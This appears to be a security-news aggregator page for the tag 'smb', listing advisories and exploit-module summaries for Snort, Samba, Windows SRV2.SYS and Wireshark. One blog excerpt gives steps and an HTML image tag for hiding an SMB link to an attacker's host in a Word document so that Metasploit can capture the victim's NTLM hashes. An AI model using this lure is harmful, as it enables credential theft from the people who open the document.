«
Expand/Collapse
59 items tagged "smb"
Related tags:
packet [+],
memory corruption [+],
remote [+],
txt [+],
smb service [+],
service vulnerability [+],
proof of concept [+],
denial of service [+],
client pool [+],
buffer overflows [+],
snort [+],
smb shares [+],
smb client [+],
sambascan [+],
public shares [+],
network [+],
lan [+],
host [+],
dsa [+],
dce rpc [+],
bug [+],
broadcast messages [+],
beta [+],
based buffer overflow [+],
vista [+],
validation code [+],
usa [+],
sys driver [+],
stack overflow [+],
smb2 [+],
server [+],
release candidates [+],
pool overflow [+],
null pointer [+],
nmb [+],
network traffic analyzer [+],
nego [+],
microsoft smb [+],
mdvsa [+],
master browser [+],
mandriva linux [+],
mac [+],
local area network [+],
kernel stack [+],
hangup [+],
dissector [+],
crash proof [+],
authentication mechanisms [+],
authentication mechanism [+],
agustin azubel [+],
advisory updates [+],
microsoft [+],
windows [+],
unauthorized access [+],
stack buffer [+],
smb share [+],
smb server [+],
size pool [+],
side [+],
share [+],
service [+],
safer use [+],
root privileges [+],
protocol [+],
outlook [+],
office document [+],
nonce [+],
netware [+],
negotiate [+],
multiple [+],
microsoft outlook [+],
message size [+],
message [+],
memory location [+],
memory allocation [+],
ipmi [+],
html [+],
glsa [+],
gentoo linux security [+],
exhaustion [+],
dos windows [+],
denial of service attacks [+],
daintree [+],
client response [+],
client message [+],
client kernel [+],
client [+],
capture server [+],
buffer overflow vulnerability [+],
arp spoofing [+],
Pentesting [+],
vulnerability [+],
microsoft windows [+],
code execution [+],
samba [+]
-
-
18:32
»
Packet Storm Security Exploits
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
-
18:32
»
Packet Storm Security Recent Files
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
-
18:32
»
Packet Storm Security Misc. Files
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
-
-
21:46
»
Carnal0wnage
Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...
In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.
I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
width=1 height=1][/body][html]
Once that is done go to insert-->object--text from file-->select your HTML file
Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.
If this doesnt work for anyone let me know.
-
-
10:45
»
SecDocs
Authors:
Agustin Azubel Hernan Ochoa Tags:
Windows NTLM Event:
Black Hat USA 2010 Abstract: In February 2010, we found a vulnerability in the SMB NTLM Windows Authentication mechanism that have been present in Windows systems for at least 14 years (from Windows NT 4 to Windows Server 2008). You probably haven't heard about this vulnerability, but basically the authentication mechanism used by all Windows systems to access remote resources using SMB was flawed, allowing attackers to get read/write access to remote resources and remote code execution without credentials, using different techniques such as passive replay attacks, active collection of duplicate challenges/responses, and prediction of challenges. This vulnerability is also a good example of flaws found in challenge-response authentication mechanisms. This presentation will describe the vulnerability in detail, including its scope and severity, explain different techniques to exploit the flaws found and demo fully functional exploit code.
-
10:45
»
SecDocs
Authors:
Agustin Azubel Hernan Ochoa Tags:
Windows NTLM Event:
Black Hat USA 2010 Abstract: In February 2010, we found a vulnerability in the SMB NTLM Windows Authentication mechanism that have been present in Windows systems for at least 14 years (from Windows NT 4 to Windows Server 2008). You probably haven't heard about this vulnerability, but basically the authentication mechanism used by all Windows systems to access remote resources using SMB was flawed, allowing attackers to get read/write access to remote resources and remote code execution without credentials, using different techniques such as passive replay attacks, active collection of duplicate challenges/responses, and prediction of challenges. This vulnerability is also a good example of flaws found in challenge-response authentication mechanisms. This presentation will describe the vulnerability in detail, including its scope and severity, explain different techniques to exploit the flaws found and demo fully functional exploit code.
-
-
13:12
»
Packet Storm Security Recent Files
Sambascan2 allows you to search an entire network or a number of hosts for SMB shares. It will also list the contents of all public shares that it finds. The difference between sambascan2 and other SMB viewers and scanners is that it will search everything using TCP/IP, and it will not send a lot of broadcast messages, so it can be used over LAN boundaries. It only uses SMB to list the shares and their contents.
-
13:12
»
Packet Storm Security Tools
Sambascan2 allows you to search an entire network or a number of hosts for SMB shares. It will also list the contents of all public shares that it finds. The difference between sambascan2 and other SMB viewers and scanners is that it will search everything using TCP/IP, and it will not send a lot of broadcast messages, so it can be used over LAN boundaries. It only uses SMB to list the shares and their contents.
-
13:12
»
Packet Storm Security Misc. Files
Sambascan2 allows you to search an entire network or a number of hosts for SMB shares. It will also list the contents of all public shares that it finds. The difference between sambascan2 and other SMB viewers and scanners is that it will search everything using TCP/IP, and it will not send a lot of broadcast messages, so it can be used over LAN boundaries. It only uses SMB to list the shares and their contents.
-
-
13:01
»
Packet Storm Security Tools
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
13:01
»
Packet Storm Security Recent Files
NMB Scanner scans the shares of a SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the hosts lists maintained by master browsers.
-
-
19:02
»
Packet Storm Security Recent Files
Debian Linux Security Advisory 2066-1 - Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer. It was discovered that null pointer dereferences, buffer overflows and infinite loops in the SMB, SMB PIPE, ASN1.1 and SigComp dissectors could lead to denial of service or the execution of arbitrary code.
-
19:01
»
Packet Storm Security Advisories
Debian Linux Security Advisory 2066-1 - Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer. It was discovered that null pointer dereferences, buffer overflows and infinite loops in the SMB, SMB PIPE, ASN1.1 and SigComp dissectors could lead to denial of service or the execution of arbitrary code.
-
-
22:01
»
Packet Storm Security Advisories
Debian Linux Security Advisory 2061-1 - Jun Mao discovered that Samba, an implementation of the SMB/CIFS protocol for Unix systems, is not properly handling certain offset values when processing chained SMB1 packets. This enables an unauthenticated attacker to write to an arbitrary memory location resulting in the possibility to execute arbitrary code with root privileges or to perform denial of service attacks by crashing the samba daemon.
-
-
22:00
»
Packet Storm Security Advisories
Gentoo Linux Security Advisory 201006-5 - Multiple vulnerabilities were found in Wireshark. Multiple vulnerabilities were found in the Daintree SNA file parser, the SMB, SMB2, IPMI, and DOCSIS dissectors. Versions less than 1.2.8-r1 are affected.
-
-
20:00
»
Packet Storm Security Advisories
A vulnerability exists in the SMB client of Microsoft Windows 7 and Windows Server 2008 R2. This vulnerability allows an attacker to trigger a kernel stack overflow by sending a specific SMB_COM_TRANSACTION2 response. Attacking the SMB client can be achieved by convincing a user to connect to a malicious SMB server. Alternatively, the attacker could attempt man-in-the-middle attacks (such as ARP spoofing, NBNS packet spoofing, etc.) to redirect legitimate SMB connections to a malicious SMB server. Successful exploitation of this issue may result in remote code execution with kernel privileges.
-
-
21:49
»
SecuriTeam
An unauthenticated remote attacker without any kind of credentials can access the SMB service under the credentials of an authorized user.
-
Make your website safer. Use external penetration testing service. First report ready in one hour!
-
-
11:00
»
Packet Storm Security Recent Files
This Metasploit module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
-
11:00
»
Packet Storm Security Exploits
This Metasploit module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
-
-
21:00
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2010-031 - This advisory updates Wireshark to the version 1.0.11, which fixes The SMB and SMB2 dissectors could crash. The Infiniband dissector could crash on some platforms. Several buffer overflows were discovered and fixed in the LWRES dissector.
-
21:00
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-031 - This advisory updates Wireshark to the version 1.0.11, which fixes The SMB and SMB2 dissectors could crash. The Infiniband dissector could crash on some platforms. Several buffer overflows were discovered and fixed in the LWRES dissector.
1337day (was: Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Sophos security news
Penetration Testing
BackTrack Linux Forums
Threatpost
carnal0wnage.attackresearch.com
Darknet
The Exploitant
Hack a Day
Wirevolution
